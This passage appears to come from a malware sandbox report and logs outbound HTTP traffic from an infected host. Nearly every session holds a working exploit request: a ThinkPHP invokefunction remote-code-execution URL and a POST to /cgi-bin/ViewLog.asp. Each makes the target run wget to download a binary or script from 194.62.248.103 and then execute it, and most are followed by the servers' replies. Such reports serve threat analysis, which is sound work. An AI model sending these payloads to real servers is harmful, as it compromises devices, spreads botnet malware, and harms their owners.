                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        91192.168.2.235130662.29.54.2478080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:11.471848965 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        92192.168.2.233699495.86.114.9980
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:11.489820004 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        93192.168.2.236093095.168.217.1580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:11.768189907 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:12.080648899 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:35:11 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        94192.168.2.235850895.217.50.7280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:11.785307884 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:12.108623028 CEST503INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:35:11 GMT
                                                        Server: Apache/2.4.52 (Ubuntu)
                                                        Content-Length: 309
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 63 68 61 6e 64 72 61 2e 69 33 76 6e 63 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at chandra.i3vnc.com Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        95192.168.2.236004494.74.160.1798080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:11.809336901 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:12.239345074 CEST415INHTTP/1.1 404 Not Found
                                                        Date: Sun, 14 Apr 2024 14:26:19 GMT
                                                        Server: DNVRS-Webs
                                                        Cache-Control: no-cache
                                                        Content-Length: 193
                                                        Content-Type: text/html
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=60, max=99
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open document: /cgi-bin/ViewLog.asp</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        96192.168.2.234793295.249.99.6680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:11.821697950 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:12.153430939 CEST495INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:35:12 GMT
                                                        Server: Apache/2.4.41 (Ubuntu)
                                                        Content-Length: 301
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        97192.168.2.233351095.100.128.9680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:11.826436043 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:12.162895918 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:35:11 GMT
                                                        Date: Sun, 14 Apr 2024 14:35:11 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 35 33 30 37 62 35 63 26 23 34 36 3b 31 37 31 33 31 30 35 33 31 31 26 23 34 36 3b 34 62 38 35 36 31 63 62 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 65 35 33 30 37 62 35 63 26 23 34 36 3b 31 37 31 33 31 30 35 33 31 31 26 23 34 36 3b 34 62 38 35 36 31 63 62 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;e5307b5c&#46;1713105311&#46;4b8561cb<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;e5307b5c&#46;1713105311&#46;4b8561cb</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        98192.168.2.234518095.156.103.11480
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:12.142679930 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:12.519036055 CEST404INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:35:26 GMT
                                                        Server: Apache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        99192.168.2.235061695.56.128.5280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:12.149961948 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:12.531076908 CEST29INHTTP/1.1 200 OK
                                                        Apr 14, 2024 16:35:12.532049894 CEST515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                        Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        100192.168.2.2349944112.30.175.10780
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:12.490108967 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        101192.168.2.235380462.21.103.2518080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:12.571460009 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        102192.168.2.235131095.47.167.2268080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:12.582928896 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:14.307634115 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:16.323420048 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:20.514838934 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:28.705686092 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:44.831464052 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:18.874737024 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        103192.168.2.234074494.122.11.1388080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:12.587737083 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        104192.168.2.235126085.95.249.68080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:12.605179071 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        105192.168.2.233354695.100.128.9680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:12.851999044 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:13.183885098 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:35:13 GMT
                                                        Date: Sun, 14 Apr 2024 14:35:13 GMT
                                                        Connection: close
